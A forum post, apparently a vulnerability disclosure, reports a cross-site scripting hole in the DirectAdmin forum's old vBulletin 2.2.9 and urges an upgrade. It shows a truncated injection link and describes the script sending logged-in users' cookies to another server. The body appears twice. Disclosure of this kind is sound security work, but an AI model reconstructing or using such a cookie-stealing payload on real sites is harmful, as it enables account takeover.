It has come to my attention that directadmin.com is highly vulnerable to hacking. Passwords of any user can be stolen by them simply clicking on a link, as I will demonstrate below.
Here is an example link that is vulnerable. Basically, it rips the cookie of any user containing that user's login information. An attacker can gain entry to anyone's account who clicks on the link, including site administrators and moderators. Here is the link:
http://www.directadmin.com/forum/me...kie</SCRIPT><r=&perpage=25&orderby=username
The link injects javascript code remotely. The javascript code that is injected redirects the user to another server which includes the full cookie of the user currently logged in on directadmin.com. This is an EXTREMELY HIGH security risk.
In order to remedy the above problem and protect the integrity of directadmin's almost 8,000 members, I STRONGLY suggest that you upgrade the version of vBulletin to the most recent version. The current version used by directadmin is almost 5 years old and several security flaws have been found in vBulletin version 2.2.9.
I hope the staff at directadmin takes this message seriously. Luckily, an honest person found this flaw and chose not to exploit this bug with malicious intent. This could have been much worse if a true hacker found your site's bug. Furthermore, if you ever need additional assistance regarding technical information or security related issues, please feel free to contact me.
-alzika
Here is an example link that is vulnerable. Basically, it rips the cookie of any user containing that user's login information. An attacker can gain entry to anyone's account who clicks on the link, including site administrators and moderators. Here is the link:
http://www.directadmin.com/forum/me...kie</SCRIPT><r=&perpage=25&orderby=username
The link injects javascript code remotely. The javascript code that is injected redirects the user to another server which includes the full cookie of the user currently logged in on directadmin.com. This is an EXTREMELY HIGH security risk.
In order to remedy the above problem and protect the integrity of directadmin's almost 8,000 members, I STRONGLY suggest that you upgrade the version of vBulletin to the most recent version. The current version used by directadmin is almost 5 years old and several security flaws have been found in vBulletin version 2.2.9.
I hope the staff at directadmin takes this message seriously. Luckily, an honest person found this flaw and chose not to exploit this bug with malicious intent. This could have been much worse if a true hacker found your site's bug. Furthermore, if you ever need additional assistance regarding technical information or security related issues, please feel free to contact me.
-alzika
Last edited:
